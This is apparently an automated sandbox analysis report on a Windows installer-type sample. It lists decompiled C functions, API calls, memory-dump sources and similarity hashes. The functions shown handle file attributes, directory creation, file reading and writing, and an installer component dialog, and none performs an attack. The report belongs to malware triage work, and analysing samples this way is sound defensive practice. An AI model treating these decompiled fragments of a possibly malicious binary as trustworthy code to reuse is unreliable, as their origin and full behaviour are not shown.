Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405B14, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B14(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}

0x00405b19
0x00405b1f
0x00405b24
0x00405b2d
0x00405b2d
0x00405b36

APIs

GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B2D

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040560A, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040560A(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405610
0x00405618
0x00000000
0x0040561e
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BE0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405be4
0x00405bf4
0x00405bfc
0x00000000
0x00405c03
0x00000000
0x00405c05

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405BB1, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BB1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405bb5
0x00405bc5
0x00405bcd
0x00000000
0x00405bd4
0x00000000
0x00405bd6

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4

Uniqueness

Uniqueness Score: -1.00%

Function 0040159D, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040159D() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402ACB(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a8
0x004015ae
0x004015b0
0x0040271c
0x0040271c
0x0040295a
0x00402966

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8bf4424ee6d6bcc39c5cd0a8efa9467a12a75f184308e4e377912ed91c8dda4a
Instruction ID: 16624c16aa0e128540259aec7752c58df5b2033d878da01750b81a807d48f065
Opcode Fuzzy Hash: 8bf4424ee6d6bcc39c5cd0a8efa9467a12a75f184308e4e377912ed91c8dda4a
Instruction Fuzzy Hash: 73D012727041129BCB10EBE89B489DEB7A49B50328B308537D111F31D1D6B98A45A72D

Uniqueness

Uniqueness Score: -1.00%

Function 004031C4, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031C4(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004031d2
0x004031d8

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004036F4, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036F4() {
				void* _t1;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403739();
				return E00405768(_t6, 0x436800, 7);
			}

0x004036f4
0x004036fc
0x004036ff
0x00403705
0x00403705
0x00403705
0x0040370c
0x0040371d

APIs

CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 35c0b0f0e0d1f09e021a6203f380c979fef5023119a7d0470754e1d660f81c6c
Instruction ID: fcdeae3644427ae1932c05eee93fd893892bcf305b30f8148603d437c2107f19
Opcode Fuzzy Hash: 35c0b0f0e0d1f09e021a6203f380c979fef5023119a7d0470754e1d660f81c6c
Instruction Fuzzy Hash: F0C012B0500701A6C5247F749E8F6053E556B41735F648735F0B4B60F1C77C4659956E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404A44, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00404A44(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageA;
				_v20 =  *0x42f448;
				_t282 = 0;
				_v24 =  *0x42f414 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42f41d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404992(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42f41c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42a854;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x42a868;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42a854 = _t282;
								 *0x42a868 = _t282;
								 *0x42f480 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42f41d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404A12();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x42a868;
									_t195 =  *0x42f448;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42f44c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x42ebdc; // 0x546847
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E0040494D(0x3ff, 0xfffffffb, E00404965(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x106]);
									} while (_v20 <  *0x42f44c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x42a868);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageA(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageA(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42f480 = _t306;
					 *0x42a868 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_t252 = LoadBitmapA( *0x42f400, 0x6e);
					 *0x42a85c =  *0x42a85c | 0xffffffff;
					_t313 = _t252;
					 *0x42a864 = SetWindowLongA(_v8, 0xfffffffc, E0040503B);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a854 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a854);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405FC2(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E0040403F(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E0040403F(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42f44c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x42a868 + _t316 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x42a868 + _t316 * 4) = _t276;
									_t284 =  *( *0x42a868 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_v28 = _t302;
						} while (_t316 <  *0x42f44c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404074(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404074(_v12);
								L91:
								return E004040A6(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404a53
0x00404a64
0x00404a69
0x00404a71
0x00404a77
0x00404a7f
0x00404a8d
0x00404a90
0x00404cb0
0x00404cb7
0x00404ccb
0x00404cb9
0x00404cbb
0x00404cbe
0x00404cbf
0x00404cc6
0x00404cc6
0x00404cd7
0x00404ce5
0x00404ce8
0x00404cfe
0x00404d73
0x00404d76
0x00404d78
0x00404d82
0x00404d90
0x00404d90
0x00404d92
0x00404d9c
0x00404da2
0x00404da5
0x00404da8
0x00404dc3
0x00404daa
0x00404db4
0x00404db4
0x00404da8
0x00404d9c
0x00000000
0x00404d76
0x00404d03
0x00404d0e
0x00404d13
0x00404d1a
0x00404d1f
0x00404d23
0x00404d2e
0x00404d2e
0x00404d32
0x00404d36
0x00404d3a
0x00404d4d
0x00404d3c
0x00404d3c
0x00404d43
0x00404d49
0x00404d45
0x00404d45
0x00404d45
0x00404d43
0x00404d51
0x00404d53
0x00404d66
0x00404d69
0x00404d6c
0x00404d6c
0x00404d36
0x00000000
0x00404d23
0x00404d05
0x00404d0c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404dc6
0x00404dc6
0x00404dcd
0x00404e3e
0x00404e46
0x00404e4e
0x00404e4e
0x00404e57
0x00404e59
0x00404e60
0x00404e63
0x00404e63
0x00404e69
0x00404e70
0x00404e73
0x00404e73
0x00404e79
0x00404e7f
0x00404e85
0x00404e85
0x00404e92
0x00404fe8
0x00404fef
0x0040500c
0x00405012
0x00405024
0x00405024
0x00000000
0x00404e98
0x00404e9a
0x00404e9f
0x00404ea4
0x00404ea9
0x00404eab
0x00404eab
0x00404eac
0x00404ead
0x00404eaf
0x00404eaf
0x00404eb7
0x00404ef8
0x00404efa
0x00404f0a
0x00404f0d
0x00404f12
0x00404f19
0x00404f1c
0x00404fbe
0x00404fc4
0x00404fca
0x00404fd2
0x00404fe3
0x00404fe3
0x00000000
0x00404fd2
0x00404f22
0x00404f25
0x00404f2b
0x00404f30
0x00404f32
0x00404f34
0x00404f3a
0x00404f41
0x00404f46
0x00404f4d
0x00404f50
0x00404f50
0x00404f57
0x00404f63
0x00404f67
0x00404f69
0x00404f69
0x00404f59
0x00404f5b
0x00404f5b
0x00404f89
0x00404f95
0x00404fa4
0x00404fa4
0x00404fa6
0x00404fa9
0x00404fb2
0x00000000
0x00404eb9
0x00404ec4
0x00404ec7
0x00404ecc
0x00404ece
0x00404ed2
0x00404ee2
0x00404eec
0x00404eee
0x00404ef1
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ed4
0x00404ed4
0x00404eda
0x00404edc
0x00404edc
0x00404edd
0x00404ede
0x00000000
0x00404ed4
0x00404eb7
0x00404e92
0x00404dd5
0x00000000
0x00404deb
0x00404df5
0x00404dfa
0x00000000
0x00000000
0x00404e0c
0x00404e11
0x00404e1d
0x00404e1d
0x00404e1f
0x00404e2e
0x00404e30
0x00404e34
0x00404e37
0x00000000
0x00404e37
0x00404dd5
0x00404a96
0x00404a9b
0x00404aa4
0x00404aab
0x00404ab9
0x00404ac4
0x00404aca
0x00404ad8
0x00404aec
0x00404af1
0x00404afe
0x00404b03
0x00404b19
0x00404b2a
0x00404b37
0x00404b37
0x00404b3a
0x00404b40
0x00404b42
0x00404b45
0x00404b4a
0x00404b4f
0x00404b51
0x00404b51
0x00404b71
0x00404b71
0x00404b73
0x00404b74
0x00404b79
0x00404b7c
0x00404b7f
0x00404b83
0x00404b88
0x00404b8d
0x00404b91
0x00404b96
0x00404b9b
0x00404b9d
0x00404ba5
0x00404c6f
0x00404c82
0x00000000
0x00404bab
0x00404bae
0x00404bb1
0x00404bb4
0x00404bb4
0x00404bba
0x00404bc0
0x00404bc3
0x00404bc9
0x00404bca
0x00404bcf
0x00404bd8
0x00404bdf
0x00404be2
0x00404be5
0x00404be8
0x00404c24
0x00404c4d
0x00404c26
0x00404c33
0x00404c33
0x00404bea
0x00404bed
0x00404bfc
0x00404c06
0x00404c0e
0x00404c15
0x00404c1d
0x00404c1d
0x00404be8
0x00404c53
0x00404c54
0x00404c60
0x00404c60
0x00404c6d
0x00404c88
0x00404c8c
0x00404ca9
0x00404cae
0x00000000
0x00404c8e
0x00404c93
0x00404c9c
0x00405026
0x00405038
0x00405038
0x00404c8c
0x00000000
0x00404c6d
0x00404ba5

APIs

GetDlgItem.USER32 ref: 00404A5C
GetDlgItem.USER32 ref: 00404A67
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
LoadBitmapA.USER32 ref: 00404AC4
SetWindowLongA.USER32 ref: 00404ADD
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
DeleteObject.GDI32(00000000), ref: 00404B3A
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
GetWindowLongA.USER32 ref: 00404C74
SetWindowLongA.USER32 ref: 00404C82
ShowWindow.USER32(?,00000005), ref: 00404C93
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
ImageList_Destroy.COMCTL32(?), ref: 00404E63
GlobalFree.KERNEL32 ref: 00404E73
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
ShowWindow.USER32(?,00000000), ref: 00405012
GetDlgItem.USER32 ref: 0040501D
ShowWindow.USER32(00000000), ref: 00405024

Strings

GhT, xrefs: 00404FCA
, xrefs: 00404FFC
M, xrefs: 00404BED
N, xrefs: 00404CCE

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
